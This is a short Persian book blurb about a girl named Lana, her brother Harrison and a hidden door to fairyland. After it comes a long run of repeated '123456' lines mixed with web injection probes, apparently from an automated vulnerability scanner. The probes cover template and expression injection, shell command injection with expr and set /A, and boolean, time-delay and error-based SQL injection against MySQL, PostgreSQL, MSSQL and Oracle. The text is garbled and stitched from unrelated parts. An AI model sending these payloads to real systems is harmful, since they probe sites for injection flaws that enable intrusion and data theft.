اما وقتی هریسون به این نتیجه میرسد که دیگر برای بازی کردن با خواهرش بزرگ شده، لانا احساس تنهایی میکند. تا وقتی که یک اتفاق جادویی میافتد.
لانا دریچهای به سرزمین پریان کشف میکند که آن را در فروشگاه جدید عجیبی پنهان کردهاند، اما قصههایش از آن مدل افسانههایی نیستند که پایان خوش دارند؛ آنها ناشناخته و خطرناکند و شخصیتهایش به کمک لانا نیاز دارند تا جادوگر بدجنس را شکست بدهند، ولی لانا بهتنهایی از پس این کار برنمیآید.
آیا لانا میتواند قبل از اینکه خیلی دیر شود هریسون را متقاعد کند تا دوباره قصهها را باور کند و با او همسفر شود؟
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
${@var_dump(md5(544785859))};
123456
${895709635+805699364}
123456
123456
'-var_dump(md5(445683524))-'
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
/*1*/{{862373987+955458211}}
123456
123456
123456
${976909677+909530947}
123456
${(897696069+947787948)?c}
123456
123456
#set($c=911358256+813019251)${c}$c
123456
expr 872680065 + 851107191
123456
<%- 827737302+827589479 %>
123456|expr 874866995 + 906973431
123456
123456
123456$(expr 938777007 + 985724654)
123456
123456
123456&set /A 904115030+863305669
123456
123456
expr 994188858 + 952142427
123456
123456
123456
123456
123456/**/and+0=0
123456
123456/**/and+1=7
123456
123456
123456
123456'and'i'='i
123456
123456
123456'and'r'='q
123456
123456
123456
123456"and"d"="d
123456
123456
123456"and"g"="v
123456
123456
(select*from(select+sleep(0)union/**/select+1)a)
123456
123456
(select*from(select+sleep(8)union/**/select+1)a)
123456
123456
123456'and(select*from(select+sleep(0))a/**/union/**/select+1)='
123456
123456'and/**/extractvalue(1,concat(char(126),md5(1365121213)))and'
123456'and(select*from(select+sleep(8))a/**/union/**/select+1)='
123456"and/**/extractvalue(1,concat(char(126),md5(1594237849)))and"
123456"and(select*from(select+sleep(0))a/**/union/**/select+1)="
extractvalue(1,concat(char(126),md5(1925731914)))
123456"and(select*from(select+sleep(8))a/**/union/**/select+1)="
123456'and(select'1'from/**/cast(md5(1526752121)as/**/int))>'0
123456/**/and(select+1/**/from/**/pg_sleep(0))>0/**/
123456/**/and/**/cast(md5('1842661833')as/**/int)>0
123456/**/and(select+1/**/from/**/pg_sleep(8))>0/**/
convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1708865934')))
123456'/**/and(select'1'from/**/pg_sleep(0))::text>'0
123456'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1914172998')))>'0
123456'/**/and(select'1'from/**/pg_sleep(8))::text>'0
123456鎈'"\(
123456/**/and(select+1)>0waitfor/**/delay'0:0:0'/**/
123456'"\(
123456/**/and(select+1)>0waitfor/**/delay'0:0:8'/**/
123456'and(select+1)>0waitfor/**/delay'0:0:0
123456'and(select+1)>0waitfor/**/delay'0:0:8
123456/**/and/**/4=DBMS_PIPE.RECEIVE_MESSAGE('h',0)
123456/**/and/**/4=DBMS_PIPE.RECEIVE_MESSAGE('d',8)
123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('v',0)='v
123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('s',8)='s
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456